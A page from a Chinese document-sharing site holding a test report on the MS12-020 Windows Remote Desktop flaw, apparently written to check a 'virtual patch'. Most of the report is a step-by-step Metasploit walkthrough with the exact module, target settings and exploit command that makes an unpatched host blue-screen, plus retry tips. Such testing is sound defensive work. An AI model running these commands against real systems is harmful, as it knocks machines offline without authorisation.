为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

关于MS12-020漏洞攻击测试报告

2019-08-21 7页 doc 25KB 38阅读

用户头像

is_963767

暂无简介

举报
关于MS12-020漏洞攻击测试报告关于MS12-020漏洞攻击测试报告 测试目的:针对windows操作系统的漏洞,在为打补丁之前,利用虚拟补丁对漏洞进行防护的有效性,保护用户使用安全。 操作系统(版本、语言):服务器端:windows server 2008 R2 64位,客户端:windows xp 64位。 一、虚拟补丁功能测试过程 漏洞编号:MS12-020 测试工具:Metasploit 测试过程: 客户端: 1、确定系统没有安装MS12-020补丁(KB2621440 或  KB2667402) 2、启用远程桌面服务 攻击主机 1、安装攻击...
关于MS12-020漏洞攻击测试报告
关于MS12-020漏洞攻击测试 测试目的:针对windows操作系统的漏洞,在为打补丁之前,利用虚拟补丁对漏洞进行防护的有效性,保护用户使用安全。 操作系统(版本、语言):服务器端:windows server 2008 R2 64位,客户端:windows xp 64位。 一、虚拟补丁功能测试过程 漏洞编号:MS12-020 测试工具:Metasploit 测试过程: 客户端: 1、确定系统没有安装MS12-020补丁(KB2621440 或  KB2667402) 2、启用远程桌面服务 攻击主机 1、安装攻击测试工具 metasploit。 2、安装完后,打开metasploit: 开始—所有程序—Metasploit中的Metasploit Console控制台: 3、控制台打开后,将出现如下界面 4、攻击开始 (1) 输入如下命令(红色字体为需要输入部分) msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf  auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name  Current Setting  Required  Description —-  —————  ——–  ———– RHOST                  yes      The target address RPORT  3389            yes      The target port msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.51.88 RHOST => 192.168.51.88 5、攻击命令输入 msf  auxiliary(ms12_020_maxchannelids) > exploit 6、 被攻击主机将瞬间蓝屏 备注:请在被攻击主机系统完全启动完毕后,等待一会儿再进行攻击,因为一般VM启动后,远程桌面需要稍等片刻才会完全启动完毕。 攻击时,如果未出现蓝屏,请重复攻击1-2次。 攻击成功后,将显示RPDWD.SYS问题导致蓝屏 7、攻击主机显示目标计算机的RDPDown掉
/
本文档为【关于MS12-020漏洞攻击测试报告】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索